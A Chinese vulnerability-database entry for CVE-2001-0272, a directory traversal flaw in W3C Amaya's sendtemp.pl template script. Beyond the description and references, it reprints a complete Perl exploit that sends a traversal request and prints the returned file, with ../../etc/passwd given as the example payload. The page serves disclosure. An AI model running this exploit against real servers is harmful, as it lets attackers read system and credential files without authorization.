W3C Amaya Templates Server sendtemp.pl远程目录遍历漏洞
漏洞ID | 1106245 | 漏洞类型 | 未知 |
发布时间 | 2001-03-04 | 更新时间 | 2001-05-03 |
CVE编号 | CVE-2001-0272 |
CNNVD-ID | CNNVD-200105-031 |
漏洞平台 | CGI | CVSS评分 | 5.0 |
|漏洞来源
|漏洞详情
W3C的Amaya是一个所见即所得的Web浏览器和认证程序。它有一个叫做模板服务器的组件,可以从一个ApacheWeb服务器取得模板用在基于Amaya的认证。Amaya模板服务器的一个脚本程序sendtemp.pl实现上存在输入验证漏洞,远程攻击者可能利用此漏洞遍历服务器的目录,读取任意Apache服务进程有权限读取的文件。
|漏洞EXP
#!/usr/bin/perl -w
# sendtemp.pl: A part of the Amaya Web development
# server contains a file disclosure vulnerability,
# which allows remote, read access to files
# on the servers file system, as whichever
# user the httpd is running as.
#
# The Vulnerability is really quite simple..
# When the `templ` argument is past to
# sendtemp.pl it adds a link to the chosen stylesheet
# and a META field containing the publication's
# URL of the new file to the chosen template.
# For example:
# http://localhost/cgi-bin/sendtemp.pl?templ=template.xml
# This is all well and good, however..
# There is no sanity checking on the param you pass to the script..
# Ie: my $temp_file = param("templ");
#
# So by simply issuing a GET to:
# "http://localhost/cgi-bin/sendtemp.pl?templ=../../etc/passwd"
# The systems file system can be traversed and the passwd file can be read.
# (Assuming the http daemon hasn't been run under chroot())
#
# Follows is a simple exploit.. however, its just as easy
# to do this manually in your web browser.
# I really couldnt be bothered to format the output in any way,
# It only encourages script kiddies.
#
# Finally, "l33t hax0r greetz" to..
# ne0h, b0red, loophole, shad0w and the old dL crew..
# Scott, Jim, Mike.. All of the guys at Global Intersec.
#
# Tom Parker - [email protected]
# MRX of HHP-Programming (www.hhp-programming.net)
# Global InterSec INC California - Security Audits, Penetration testing, code auditing.
use IO::Socket;
print qq~
----------------------------------------------------------
W3.ORG sendtemp.pl exploit by Tom Parker - [email protected]
MRX of HHP-Programming (www.hhp-programming.net)
- Global InterSec INC California -
----------------------------------------------------------
~;
if((!defined($ARGV[0]))||(!defined($ARGV[1]))) { print "Usage: %filename.pl <hostname> <file-to-get>n"; exit 0; }
$SOCKET = IO::Socket::INET->new("$ARGV[0]:80");
print $SOCKET "GET /cgi-bin/sendtemp.pl?templ=$ARGV[1]n";
print "Sent request for $ARGV[1] (http://$ARGV[0]/cgi-bin/sendtemp.pl?templ=$ARGV[1])n";
while(<$SOCKET>) {
push @DATA, $_;
}
my $woot = join(' ',@DATA);
if($woot =~/$ARGV[1] wasn't found/) { print "$ARGV[1] dosnt seem to exist.n"; exit 0; }
else { print "@DATA"; }
# milw0rm.com [2001-03-04]
|受影响的产品
W3.Org Sendtemp.Pl 0
|参考资料
来源:BUGTRAQ
名称:20010212W3.ORGsendtemp.pl
链接:http://archives.neohapsis.com/archives/bugtraq/2001-02/0259.html
相关推荐: healthd Buffer Overflow Vulnerability
healthd Buffer Overflow Vulnerability 漏洞ID 1104270 漏洞类型 Boundary Condition Error 发布时间 2000-04-10 更新时间 2000-04-10 CVE编号 N/A CNNVD-I…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666